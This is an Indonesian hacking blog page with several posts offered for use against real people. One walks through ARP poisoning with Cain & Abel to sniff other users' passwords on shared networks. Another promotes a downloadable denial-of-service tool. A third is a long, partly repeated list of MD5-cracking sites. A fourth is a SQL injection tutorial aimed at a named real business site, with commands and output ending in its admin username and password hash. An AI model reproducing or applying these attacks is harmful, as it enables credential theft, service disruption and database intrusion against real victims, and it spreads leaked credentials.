Sniff password dengan cain dan abel [ LAN ]

Untuk proses installnya gak usah di ajarin ya.. ane anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang ane lakuin.
langsung aja buka cain + abelnya..
klik start / stop sniffer

Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini

pada mac address scan langsung klik OK saja
maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya

setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja.
Klik APR di tab bagian bawah, dan tampilan akan seperti ini

setelah itu klik tanda + warna biru untuk menambahkan IP address yang ingin di poisoning . tampilan akan seperti ini :

di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?]
masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya.
yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja.
Nah abis itu klik ok.
Abis langkah itu maka tampilannya seperti ini

Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning, seperti ini :

Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan
langsung saja masuk ke dalam password dengan klik tab password di bagian bawah

nah klik dibagian kiri HTTP, dan lihat hasilnya

Nah gimana ?? just simple kan ?

Rabu, 03 November 2010 // // 2 komentar //

DOS attack + source

cekidot aja dah ....

DOS TECON-CREW
http://i49.tinypic.com/25k0bbq.jpg

program ini fungsinya untuk melakukan dos attack
feature :

-dos dengan socks 4 dan socks 5
-dos http
-dos dengan menggunakan proxy

downloadnya di sini download na di sini

http://www.4shared.com/file/frncc-eC/d0s.html

Nah silahkan dicoba, moga2 bsa nambah pengetahuan kita ...amin ^^

// // 0 komentar //

kumpulan md5 crackers online

http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&amppage=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&ampl=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.mil?rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&ampl=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=crack
http://?p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://?p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…pproducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-crack/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

// // 0 komentar //

tutorial sql injection dengan Simple SQLi Dumper v5.1tutorial sql injection dengan Simple SQLi Dumper v5.1

persiapan alat perang :

1.rokok
2.cemilan
3.bir
4.cwek untuk nambah semangat nginject :D

Langkah-Langkah Yang Mesti Benar2 Di Perhatikan

1.perl kalau di linux udh ada :D ..nah gmn kalau di windows download di sini "http://www.perl.org/get.html"
2.sqli dumper v.51 ... download di sini "http://www.ziddu.com/download/10540105/ssdp51.tar.gz.html "
trus extrack yang windows extrack di drive C kl linux taruh di folder my documentnya linux .... Pfft

ok udh siapkan sekarang mulai .......

target : http://www.beautycall.co.uk/gallery.php?id=1
dork :inurl:/gallery.php?id=

nah buka jendela terminal for linux ..dan .cmd for windows

step 1 "Find Magic Number / Null Column "-magic"
Command: perl ssdp.pl -u [URL] -magic

example"ketikkan perintah ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic

dan ini hasilnya .....
--------------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:22:10 2010
Help Command: -h, -help, --help

[+] URL: http://www.beautycall.co.uk/gallery.php?id=1
[+] End Tag: --

Attempting to find the magic number...

[+] Testing: 1,2,3,

[+] Field Length : 3
[+] Magic Number : 2,3,
[+] URL Injection: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3

Showing MySQL Information ...

[+] Database: beautycall_co_uk_web
[+] User: pmowat@localhost
[+] Version: 5.0.67
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": No

Done.

---------------------------------------------------------------------------------------
step 2
find the table
Concat Tables

Command: perl ssdp.pl -u [SQLi URL] -table

contoh ketikkan perintah ini :
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table

ini hasilnya :

jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:24:59 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 40

Showing tables ...

[1] CITY(6)
[2] COUNTRY(32)
[3] admin(1)
[4] aplicationform(31)
[5] appointment(898)
[6] appointment_event(8)
[7] artist(96)
[8] artist_text_image(1)
[9] city(6)
[10] contact(1)
[11] efranchisee(122)
[12] files(2)
[13] files2(33)
[14] files3(0)
[15] folders(2)
[16] form(158)
[17] franchise(9)
[18] franchiseefolders(8)
[19] galery(20)
[20] homepage(1)
[21] links(26)
[22] links_cat(12)
[23] log(0)
[24] midlands(10)
[25] north(6)
[26] package_image(1)
[27] packages(5)
[28] postcode(122)
[29] regions(8)
[30] register(4)
[31] services(6)
[32] shortform(36)
[33] southeast(14)
[34] southwest(6)
[35] states(11)
[36] subfolders(14)
[37] ukmap(125)
[38] ukpostcodes(104)
[39] vouchers(1)
[40] wales(2)

Done.

--------------------------------------------------------------------------------
nah udh di dapatkan tablenya :D
nah lihat tuh table admin :D
sekarang kita ingin isi colomn admin tersebut .......

step 3
mencari colomn admin
Concat Columns
Required Options: -u, -t

Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
contoh ketikan command ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

hasilna seperti ini
---------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:38:30 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Number of Columns: 4

Showing columns from table "admin" ...

[+] admin(1): id,username,password,email

Done.

------------------------------------------------------------------------------------

nah itu ada isi colom admin id, username,password dan email ....wah keren yah ini tools Pfft
nah sekarang apa lagi ..

step end

dumping data

now we'll see information inside that column.. Smile

command # perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

contoh ketikkan perintah ini "
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump

hasilna
-------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:43:37 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --

[+] Database Name: database()
[+] Table Name: admin
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data ...

[1] beautycall2010 : d68553e40237bde1465a1da5b199c072

Done.

-----------------------------------------------------------------------------

akhirnya di dapatkan username dan password admin ...

username : beautycall2010
pass: d68553e40237bde1465a1da5b199c072

seee it simple ..and easy ....silahkan di coba ....

// // 0 komentar //